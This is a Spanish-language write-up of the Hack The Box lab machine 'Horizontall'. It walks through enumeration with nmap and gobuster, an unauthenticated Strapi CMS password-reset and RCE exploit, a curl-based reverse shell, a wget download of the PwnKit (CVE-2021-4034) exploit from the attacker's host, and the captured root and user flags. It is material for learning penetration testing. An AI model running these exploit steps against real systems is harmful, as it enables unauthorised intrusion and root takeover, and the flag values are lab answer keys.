Horizontall

Sobre esta maquina: HTB

Sistema Operativo: Linux

Skills Usados:

• Information Leakage

• Port Forwarding

• Strapi CMS Exploitation

• Laravel Exploitation

Metodologia:

Hacemos el primer escaneo del target.

// 
nmap -T3 -sS -n -v 10.10.11.105 -oN first_scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-27 20:05 EDT
Initiating Ping Scan at 20:05
Nmap scan report for 10.10.11.105
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.56 seconds
Raw packets sent: 1004 (44.152KB) | Rcvd: 1001 (40.048KB)

Escaneo de servicios y ejecucion de scripts

❯ nmap -sC -sV -T3 -sS -n -p22,80 -v 10.10.11.105 -oN SC_scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-27 20:07 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:07
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50

ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
|http-server-header: nginx/1.14.0 (Ubuntu)
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Revisamos lo que corre en el puerto 80 .

no muestra nada quizás por virtual hosting

Intentamos agregar el host a nostro etc/host para lograr ver algo

// 
nvim /etc/hosts

Observamos ahora si el sitio web

hacemos fuerza bruta con gobuster para enumerar subdominios.

// 
❯ gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://horizontall.htb/ -z -t 200
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url: http://horizontall.htb/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: false
Starting gobuster in VHOST enumeration mode
===============================================================
found: api-prod.horizontall.htb

visitamos el subdominio primero cargándolo a nuestro etc/hosts/

Enumeramos subdominios del mismo usando gobuster.

// 
❯ gobuster dir -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://api-prod.horizontall.htb -t 50 -z
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url: http://api-prod.horizontall.htb
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
Starting gobuster in directory enumeration mode
/admin (Status: 200) [Size: 854]
/users (Status: 403) [Size: 60]
/reviews (Status: 200) [Size: 507]

revisamos los subdominios encontrados, en el /reviews, encontramos un codigo json interesante.

obtuvimos algunos nombres de usuarios

ahora con searchsploit intentaremos conseguir alguna vulnerabilidad para Strapi.

// 
searchsploit strapi

Exploit Title | Path

Strapi 3.0.0-beta - Set Password (Unauthenticated) | multiple/webapps/50237.py
Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated) | multiple/webapps/50238.py
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) | multiple/webapps/50239.py
Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit) | nodejs/webapps/50716.rb

Guardamos el exploit que mas nos gusto en este caso el 50239, cambiamos su nombre y lo ejecutamos.

// 
searchsploit -m multiple/webapps/50239.py

❯ python3 strapy.explout.py

[-] Wrong number of arguments provided
[*] Usage: python3 exploit.py

❯ python3 strapy.explout.py http://api-prod.horizontall.htb

[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNzQ1ODAyOTUwLCJleHAiOjE3NDgzOTQ5NTB9.DJvjPjeiRDNxOatzY6tWiJTxhjKp-60AWINFYtHGBRk

Comprobamos credenciales e INGRESAMOS EXITOSAMENTE .

Comprobamos si podemos inyectar comandos de forma remota desde la terminal.

// 
❯$> whoami
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
{"statusCode":400,"error":"Bad Request","message":[{"messages":[{"id":"An error occurred"}]}]}

no nos dejo con NC pero nos fijamos que si nos deja ejecutar CURL, asi que intentaremos crear un index html y montar un servidor sencillo en python que nos permita hacer , que al ejectuar el index con curl en la maquina victima se nos envie una reverse shell estando en escucha .

Buscamos la Flag.

// 
strapi@horizontall:~/myapi$ cd /home

strapi@horizontall:/home$ ls
developer

strapi@horizontall:/home$ cd developer

strapi@horizontall:/home/developer$ ls

composer-setup.php
myproject
user.txt

strapi@horizontall:/home/developer$ cat user.txt
a7493a7702747ee7f8b4300f17a9a1fa

Conseguimos la primera flag y ahora buscamos escalar privilegios.

Buscamos alternativas para hacer escalada de privilegios y encontramos lo siguiente:

// 
trapi@horizontall:/home/developer$ which pkexec

/usr/bin/pkexec

Tiene pkexec y el comando make
lo que nos permitira ejecutar una CVE ya conocida

Ingresamos en los archivos temporales

strapi@horizontall:/home/developer$ cd /tmp/


Clonamos el CVE en nuestra maquina (no la victima)
para explotar la vulnerabilidad

git clone https://github.com/berdav/CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56 (from 1)
Receiving objects: 100% (92/92), 22.71 KiB | 394.00 KiB/s, done.
Resolving deltas: 100% (44/44), done.

Comrpimimos el exploit para mandarlo a la maquina victima

zip -r comprimido.zip CVE-2021-4034/

una vez comprimido el exploit habilitamos nuevamente el servidor python y desde la maquina victima con wget aceptamos la petición, descomprimimos el CVE hacemos make y ejectumos el exploit.

// 
strapi@horizontall:~/myapi$ wget http://10.10.14.7/comprimido.zip

--2025-04-28 02:38:09-- http://10.10.14.7/comprimido.zip
Connecting to 10.10.14.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 52950 (52K) [application/zip]
Saving to: ‘comprimido.zip’
 0K .......... .......... .......... .......... .......... 96%  161K 0s
50K .                                                     100% 1.12M=0.3s
2025-04-28 02:38:09 (166 KB/s) - ‘comprimido.zip’ saved [52950/52950]

strapi@horizontall:~/myapi$ unzip comprimido.zip

strapi@horizontall:~/myapi$ cd CVE-2021-4034

strapi@horizontall:~/myapi/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
strapi@horizontall:~/myapi/CVE-2021-4034$ ./cve-2021-4034

whoami

root

y hemos ganado acceso a root, ahora buscamos la ultima flag.

// 
cd /root

ls
boot.sh
pid
restart.sh
root.txt

cat root.txt
86dc856f7d9e662dced3806d29391a9d

Y así damos por concluida esta maquina.